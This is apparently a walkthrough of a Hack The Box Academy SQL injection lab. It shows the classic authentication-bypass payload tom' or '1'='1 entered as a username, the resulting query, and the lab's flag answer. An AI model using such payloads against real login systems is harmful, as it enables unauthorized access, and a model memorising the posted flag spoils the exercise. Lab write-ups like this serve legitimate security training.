Subverting Query Logic — SQL Injection Fundamentals — HTB Academy Walkthrough
TIER 0 MODULE: SQL INJECTION FUNDAMENTALS
SECTION: Subverting Query Logic
Please open your pwnbox or connect to the vpn in order to complete the tasks.
If you are not registered in HTB Academy, then use this link to register now: https://referral.hackthebox.com/mzxKOJt
1. Try to log in as the user ‘tom’. What is the flag value shown after you successfully log in?
When we visit the target IP, in the browser, we see an authentication portal in which we have to successfully login as tom.
But the great thing is, it displays the whole SQL query when something is entered and submitted.
By analyzing the query we have to design an injection.
We inject the query as:
tom' or '1'='1in the username field, which later constructs into:
SELECT * FROM logins WHERE username='tom' or '1'='1' AND password = '';At least one condition (of '1'='1') is true, so it allowed us access.
Answer: 202a1d1a8b195d5e9a57e434cc16000c
☣️ HAPPY ETHICAL HACKING ☣️
DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)
